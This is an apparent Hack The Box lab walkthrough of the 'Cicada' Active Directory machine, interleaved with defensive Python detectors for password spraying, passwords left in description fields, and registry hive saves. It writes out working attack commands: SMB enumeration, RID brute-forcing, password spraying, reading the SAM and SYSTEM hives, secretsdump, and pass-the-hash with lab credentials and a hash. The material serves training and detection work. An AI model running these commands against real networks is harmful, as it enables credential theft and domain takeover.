Cicada HTB Walkthrough
Step 1: Initial Enumeration with Nmap
The first step in attacking Cicada HTB is performing an Nmap scan to identify open ports and running services.
sudo nmap -sV -sC -oA nmap/cicada 10.10.11.35
Nmap Results
The scan revealed several open ports, including:
- LDAP (389, 636, 3268, 3269)
- SMB (445)
- Kerberos (88)
- MSRPC (135, 593)
- DNS (53)
This indicates an Active Directory (AD) environment, which suggests possible attacks related to SMB, Kerberos, and LDAP.
Step 2: Enumerating SMB Shares
Next, we check for accessible SMB shares:
smbclient -N -L //10.10.11.35
Discovered Shares:
- ADMIN$
- C$
- DEV
- HR
- NETLOGON
- SYSVOL
Step 3: Downloading HR Notices
Attempting to access the HR share without authentication:
smbclient //10.10.11.35/HR -U ""
get "Notice from HR.txt"
Inspecting the file:
cat Notice\ from\ HR.txt
This provides a default password:
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
Step 4: Enumerate Users with SMB
Using NetExec (nxc) to enumerate domain users by brute-forcing RIDs:
nxc smb 10.10.11.35 -u '.' -p "" --rid-brute
Step 5: Password Spraying with CME
Using CrackMapExec (CME) to spray the default password across users:
cme smb 10.10.11.35 -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
Success:
We discover the user michael.wrightson with valid credentials.
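From the defender's side, the Step 5 spray leaves a distinctive trace: one source address failing against many different accounts in a short window, then succeeding on one. The script below is an added example (not part of this walkthrough) that detects that pattern over constructed log lines in a simplified "timestamp|event_id|account|source_ip" layout standing in for Security events 4625 and 4624; the account names user01 and user02 and the addresses are made up, and a real pipeline would read the events from a SIEM or an evtx export.

```python
"""Password-spray detection over constructed Windows logon events.

Added example (not part of the original walkthrough). The event lines are
constructed in a simplified "timestamp|event_id|account|source_ip" layout
standing in for Security log records 4625 (logon failure) and 4624 (logon
success); a real pipeline would feed them from a SIEM or an evtx export.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample. 10.10.14.5 tries one password against many accounts
# and then logs on as one of them (the Step 5 pattern); 10.10.14.22 hammers
# a single account, which is brute force rather than a spray.
SAMPLE_EVENTS = [
    "2024-10-01T09:00:01|4625|user01|10.10.14.5",
    "2024-10-01T09:00:02|4625|user02|10.10.14.5",
    "2024-10-01T09:00:03|4625|david.orelious|10.10.14.5",
    "2024-10-01T09:00:04|4625|emily.oscars|10.10.14.5",
    "2024-10-01T09:00:05|4624|michael.wrightson|10.10.14.5",
    "2024-10-01T09:05:00|4625|emily.oscars|10.10.14.22",
    "2024-10-01T09:05:30|4625|emily.oscars|10.10.14.22",
]


def parse_event(line):
    """Split one constructed event line into (timestamp, event_id, account, source)."""
    ts, event_id, account, src = line.strip().split("|")
    return datetime.fromisoformat(ts), int(event_id), account.lower(), src


def detect_spray(lines, min_accounts=3, window=timedelta(minutes=5)):
    """Return {source_ip: {"accounts": [...], "success": [...]}} for every
    source whose failures hit >= min_accounts distinct accounts inside any
    window-long interval. "success" lists accounts that later logged on
    from the same source, which is the case worth paging someone about."""
    events = sorted((parse_event(line) for line in lines if line.strip()),
                    key=lambda e: e[0])
    failures = defaultdict(list)  # source -> [(ts, account)], time-ordered
    successes = defaultdict(set)  # source -> accounts that logged on after a failure
    for ts, eid, account, src in events:
        if eid == 4625:
            failures[src].append((ts, account))
        elif eid == 4624 and src in failures:
            successes[src].add(account)

    flagged = {}
    for src, attempts in failures.items():
        best = set()
        start = 0
        # Sliding window: advance start until the interval fits, then count
        # distinct accounts in attempts[start:end+1]; keep the largest set.
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            distinct = {acct for _, acct in attempts[start:end + 1]}
            if len(distinct) > len(best):
                best = distinct
        if len(best) >= min_accounts:
            flagged[src] = {"accounts": sorted(best), "success": sorted(successes[src])}
    return flagged


if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_EVENTS).items():
        print(f"{src}: sprayed {len(info['accounts'])} accounts, "
              f"then logged on as {info['success']}")
```

The single-account repeats from 10.10.14.22 are deliberately not flagged: that is a brute-force signature and belongs to a different rule, whereas a spray is one password against many accounts, which is why the detection counts distinct accounts per source rather than raw failures.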
Step 6: Extracting User Descriptions
Using CrackMapExec to check user descriptions:
crackmapexec smb 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
This reveals another user’s password:
cicada.htb\david.orelious : Just in case I forget my password is aRt$Lp#7t*VQ!3
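A password in an AD Description field is readable by every authenticated user, so an administrator should hunt for this before an attacker does. The script below is an added example (not part of this walkthrough) that scores each description for password-like tokens; it takes (sAMAccountName, description) pairs, which you would export with Get-ADUser -Filter * -Properties Description or an LDAP query. The svc_backup, user01, user02 and user03 records are constructed; David's description is the one shown above.

```python
"""Audit AD user Description fields for embedded passwords.

Added example (not part of the original walkthrough). It consumes
(sAMAccountName, description) pairs; in practice you would export them with
Get-ADUser -Filter * -Properties Description or an LDAP query. The sample
records are constructed, except for David's description, which is the one
the walkthrough found.
"""
import re

# Words that usually accompany a leaked credential.
KEYWORD = re.compile(r"\b(pass(?:word)?|passwd|pwd|creds?|credentials?)\b", re.I)

# Constructed sample. svc_backup, user01, user02 and user03 are made-up accounts.
SAMPLE_USERS = [
    ("david.orelious", "Just in case I forget my password is aRt$Lp#7t*VQ!3"),
    ("svc_backup", "Default: Cicada$M6Corpb*@Lp#nZp!8"),
    ("user01", "Password reset required"),
    ("user02", "See ticket INC-2023"),
    ("user03", ""),
]


def char_classes(token):
    """Count how many of lower/upper/digit/symbol appear in the token."""
    return sum((
        any(c.islower() for c in token),
        any(c.isupper() for c in token),
        any(c.isdigit() for c in token),
        any(not c.isalnum() for c in token),
    ))


def strongest_token(description):
    """Pick the whitespace-separated token that most resembles a password:
    most character classes first, then length."""
    tokens = description.split()
    if not tokens:
        return None
    return max(tokens, key=lambda t: (char_classes(t), len(t)))


def audit_descriptions(users):
    """Return [(sam, suspicious_token)] for descriptions that either mention
    a password and carry a mixed 8+ char token, or carry a token using all
    four character classes at 12+ chars even without a keyword."""
    findings = []
    for sam, desc in users:
        desc = desc or ""
        token = strongest_token(desc)
        if token is None:
            continue
        classes = char_classes(token)
        keyword = bool(KEYWORD.search(desc))
        if (classes == 4 and len(token) >= 12) or (keyword and classes >= 3 and len(token) >= 8):
            findings.append((sam, token))
    return findings


if __name__ == "__main__":
    for sam, token in audit_descriptions(SAMPLE_USERS):
        print(f"{sam}: description contains a password-like token ({token})")
```

"Password reset required" trips the keyword but has no password-shaped token, and "INC-2023" is mixed but short and unaccompanied, so neither is reported; the two real leaks are. A production report would mask the token rather than print it.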
Step 7: Accessing the DEV Share
Using David's credentials to explore the DEV share:
smbclient //10.10.11.35/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
smb: \> dir
smb: \> get backup_script.ps1
Step 8: Gaining a PowerShell Shell
The backup script contains a password for the user emily.oscars. Using Evil-WinRM to get a shell:
evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35
Inside the shell, navigate to the desktop and retrieve user.txt:
cd C:\Users\emily.oscars\Desktop
cat user.txt
Step 9: Extracting SYSTEM & SAM Files
To escalate privileges, save the SAM and SYSTEM registry hives to disk:
reg save hklm\sam sam
reg save hklm\system system
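The two reg save commands above are a strong detection signal: ordinary administration almost never exports the SAM, SYSTEM or SECURITY hive, and SAM plus SYSTEM together is exactly what the next step needs. The script below is an added example (not part of this walkthrough) that flags such commands in process-creation telemetry, as recorded by Security event 4688 with "Include command line in process creation events" enabled, or by Sysmon event 1. The lines are constructed in a simplified "timestamp|user|command_line" layout; svc_deploy and the paths are made up.

```python
"""Flag registry hive saves in process-creation telemetry.

Added example (not part of the original walkthrough). It scans command lines
as recorded by Security event 4688 (with "Include command line in process
creation events" enabled) or Sysmon event 1; the lines below are constructed
in a simplified "timestamp|user|command_line" layout.
"""
import re

# reg save / reg.exe save against the credential-bearing hives, with or
# without quotes around the key and in either HKLM spelling.
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?\s+save\s+"?(?:hklm|hkey_local_machine)\\(sam|system|security)\b',
    re.I,
)

# Constructed sample. Only the first, second and fourth lines are hive saves;
# the query and the export of an unrelated software key are normal noise.
SAMPLE_PROCESSES = [
    r"2024-10-01T09:30:00|cicada.htb\emily.oscars|reg save hklm\sam sam",
    r"2024-10-01T09:30:01|cicada.htb\emily.oscars|reg save hklm\system system",
    r"2024-10-01T09:31:00|NT AUTHORITY\SYSTEM|reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion",
    r'2024-10-01T09:32:00|cicada.htb\emily.oscars|reg.exe save "HKLM\SECURITY" C:\temp\sec.hiv',
    r"2024-10-01T09:33:00|cicada.htb\svc_deploy|reg save hklm\software\contoso backup.hiv",
]


def find_hive_saves(lines):
    """Return {user: sorted list of hives saved} for every user who ran
    a reg save against SAM, SYSTEM or SECURITY."""
    hits = {}
    for line in lines:
        _ts, user, cmdline = line.split("|", 2)
        m = HIVE_SAVE.search(cmdline)
        if m:
            hits.setdefault(user, set()).add(m.group(1).lower())
    return {user: sorted(h) for user, h in hits.items()}


def offline_dump_possible(hives):
    """SAM plus SYSTEM (the boot key) is enough to recover local account
    hashes offline, which is what Step 10 does with secretsdump, so that
    pairing should raise the severity of the alert."""
    return {"sam", "system"} <= set(hives)


if __name__ == "__main__":
    for user, hives in find_hive_saves(SAMPLE_PROCESSES).items():
        severity = "high" if offline_dump_possible(hives) else "medium"
        print(f"{user} saved {hives} (severity {severity})")
```

Correlating the hives per user, rather than alerting on each line, is what lets the rule distinguish a lone SECURITY export from the SAM+SYSTEM pair that enables offline hash recovery.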
Step 10: Dumping Admin Hash
Using impacket-secretsdump to retrieve NTLM hashes:
impacket-secretsdump -sam sam -system system local
The dump reveals the Administrator NTLM hash.
Step 11: Logging in as Administrator
Using Evil-WinRM with the extracted hash:
evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i 10.10.11.35
Once inside, retrieve root.txt:
cd C:\Users\Administrator\Desktop
cat root.txt
Conclusion
By leveraging SMB enumeration, password spraying, and privilege escalation, we successfully exploited the Cicada box and obtained both user and root flags. This demonstrates the importance of strong, unique passwords, SMB hardening (no anonymous share access), keeping credentials out of user description fields and scripts, and monitoring Active Directory environments for unauthorized access attempts.